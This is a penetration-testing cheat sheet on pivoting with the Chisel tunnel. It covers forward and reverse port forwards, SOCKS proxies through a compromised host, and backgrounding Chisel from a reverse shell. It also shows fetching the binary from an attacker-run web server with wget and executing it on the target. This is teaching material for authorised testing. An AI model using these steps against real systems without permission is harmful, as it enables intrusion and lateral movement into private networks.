Chisel

Port Forwarding using Chisel Pivoting using Chisel

Chisel

Requirements

Requires a copy of the Chisel binary on both the target and attacker systems.

Advantages

• Chisel is a portable binary that can be run on many operating systems

  • Either system can host the chisel server on a chosen TCP port

  • Allows for a high amount of flexibility in situations where restrictions on connectivity exist

• No dependencies on SSH daemons/services running on the target

• Supports authenticated proxies to prevent unwanted connections.

Individual Port Forwarding

Example: A service on a compromised host is listening on $RPORT

1. Run the Chisel server on the target and connect from the attack box

2. Specify the port forward on the client

3. Open a port on attack box and forward traffic to remote port

# Target Machine
./chisel server --port $SERV_PORT

# Attack Machine
./chisel client $targetIP:$SERV_PORT $LHOST:$LPORT:$RHOST:$RPORT

Open $LPORT on attack box and port forward to $RPORT on target

Reverse Individual Port Forwarding

Example: A service on a compromised host is listening on $LPORT

1. Run the Chisel server on the attack box in reverse mode and connect from the target

2. Specify the port forward on the target machine

3. Open a port on attack box and forward traffic to remote port

# Attack Machine
./chisel server --reverse --port $SERV_PORT

# Target Machine
./chisel client $attackIP:$SERV_PORT R:$RPORT:$LHOST:$LPORT

Open $RPORT on attack box and forward to $LPORT on target through reverse connection.

Socks Proxy

Server Running on Attack Box

# Attack Machine
./chisel server --reverse --port 51234

# Target Machine
./chisel client $AttackIP:51234 R:127.0.0.1:54321:socks

Opens port 54321 on attack box as a reverse SOCKS proxy. Listens for connections from Chisel on this port.

Chisel Server Running on Target

# Target Machine
./chisel server --socks5 --port 51234

# Attack Machine
./chisel client $targetIP:51234 54321:socks

Open port 54321 on attack machine as a forward SOCKS proxy

Forward Dynamic SOCKS Proxy

1. Run the Chisel server on the target box

2. Use the target box as a jump host to reach additional targets routable by the target

The traffic flows forward to the target box, which acts as a transparent SOCKS proxy

# Target Machine
./chisel server --socks5 --port $SERV_PORT

# Attack Machine
./chisel client $targetIP:$SERV_PORT $LPORT:socks

Reverse Dynamic SOCKS Proxy

1. Run the Chisel server on the attack box in reverse mode

2. Connect to the Chisel server from the target and specify a reverse port forward

The traffic flows through the port on the attack box in reverse to the target box, which acts as a transparent SOCKS proxy

# Attack Machine
./chisel server --reverse --port $SERV_PORT

# Target Machine
./chisel client $attackIP:$SERV_PORT R:127.0.0.1:$LPORT:socks

Reverse Shell Tips

Run Chisel in the Background

Running chisel in the foreground in a reverse shell will render your shell useless. Background the process in order to continue to use the shell while forwarding traffic.

Linux

Background a process with '&'. Works for both client and server sides.

chisel server --port 8080 --reverse &

Windows - PowerShell

Client Side

# Use the Start-Job cmdlet with a script block
$background = { Start-Process C:\Windows\Temp\chisel.exe -ArgumentList @('client','10.0.0.2:8080','R:127.0.0.1:8800:127.0.0.1:80') }
Start-Job -ScriptBlock $background

Server Side

Note that in server mode, you'll need to make sure your port is allowed through the firewall.

# Use the Start-Job cmdlet with a script block
$background = { Start-Process C:\Windows\Temp\chisel.exe -ArgumentList @('server','--port 50001','--socks5') }
Start-Job -ScriptBlock $background

Port Forwarding using Chisel

Chisel is a fast TCP/UDP tunnel over HTTP. Is can be used for port forwarding.

Transfer Chisel Binary to Remote Machine

If the remote machine does not have chisel binary, we need to transfer it from local machine (if local machine has the binary).

# In local machine
python3 -m http.server --directory /path/to/chisel/directory

# In remote machine
wget http://<local-ip>:8000/chisel
chmod +x chisel
./chisel -h

Port Forwarding

# In remote machine
chisel server -p <listen-port>

# In local machine
chisel client <listen-ip>:<listen-port> <local-port>:<target-ip>:<target-port>

Reverse Port Forwarding

It is useful when we want to access to the host & the port that cannot be directly accessible from local machine.

# In local machine
chisel server -p 9999 --reverse

# In remote machine
# replace 10.0.0.1 with your local ip
chisel client 10.0.0.1:9999 R:8090:172.16.22.2:8000

After that, we can access to http://localhost:8090/ in local machine. In short, we can access to http://172.16.22.2:8000/ via localhost:8090. Try curl to confirm.

curl http://localhost:8090

# The result is the content of http://172.16.22.2:8000/

Example (SSH)

Assume we want to connect to SSH server (ssh://172.17.0.1:22) that cannot be directly accessed from local machine.

# In local machine
chisel server -p 9999 --reverse

# In remote machine (assume we want to connect ssh://172.17.0.1:22)
chisel client <local-ip>:9999 R:2222:172.17.0.1:22

After that, we can connect to the SSH server from local machine. Run the following command in local machine.

ssh user@localhost -p 2222

Forward Multiple Ports

# In local machine
chisel server -p 9999 --reverse

# In remote machine
chisel client 10.0.0.1:9999 R:3000:127.0.0.1:3000 R:8000:127.0.0.1:8000

After that, we can access to http://localhost:3000 and http://localhost:8000 in local machine.

Forward Dynamic SOCKS Proxy

# In remote
chisel server -p 9999 --socks5

# In local
chisel client 10.0.0.1:9999 8000:socks

Then modify /etc/proxychains.conf in local machine. Comment out the line of "socks4".

# /etc/proxychains.conf
...
socks5 127.0.0.1  8000

Reverse Dynamic SOCKS Proxy

It is useful when we want to access to the host & multiple ports that cannot be directly accessible from local machine.

# In local machine
chisel server -p 9999 --reverse --socks5

# In remote machine
chisel client 10.0.0.1:9999 R:socks

After connected, see the chisel server log:

2024/09/01 00:00:00 server: session#3: tun: proxy#R:127.0.0.1:1080=>socks: Listening

Note the 127.0.0.1:1080 and we can paste it for SOCKS proxy settings such as proxhchains and Burp.

Modify /etc/proxychains.conf in local machine. Comment out the line of "socks4".

# /etc/proxychains.conf
...
socks5 127.0.0.1 1080

To confirm if we can reach the desired host and port, run nmap with proxychains.

proxychains nmap localhost

Enable Proxychains Bash

It allows us to execute programs without adding proxychains command before main command.

proxychains bash

# Run some command without "proxychains" command.
nmap localhost

Burp Suite Settings for Proxy

If we want to use Burp Suite with proxychains, we can add the SOCKS proxy in the Proxy settings. For details, please see the SOCKS Proxy in Burp Suite.

References

• https://notes.benheater.com/books/network-pivoting/page/port-forwarding-with-chisel